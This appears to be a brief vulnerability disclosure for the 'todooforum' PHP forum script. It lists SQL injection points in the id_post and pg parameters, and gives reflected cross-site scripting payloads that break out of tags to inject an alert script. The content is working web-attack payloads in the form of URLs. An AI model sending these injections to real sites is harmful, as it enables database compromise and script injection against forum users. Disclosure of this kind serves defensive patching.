[+] SQL Injection [+] Parameter : id_post [+] http://localhost/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=[Inject_here]&pg=1 [+] Parameter : pg [+] http://localhost/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=1&pg=[Inject_Here] [+] Cross-site scripting [+] Parameter : id_post [+] http://localhost/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post='"--></style></script><script>alert(0x0000)</script>&pg=1 [+] Parameter : pg [+] http://localhost/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=2&pg='"--></style></script><script>alert(0x0000)</script>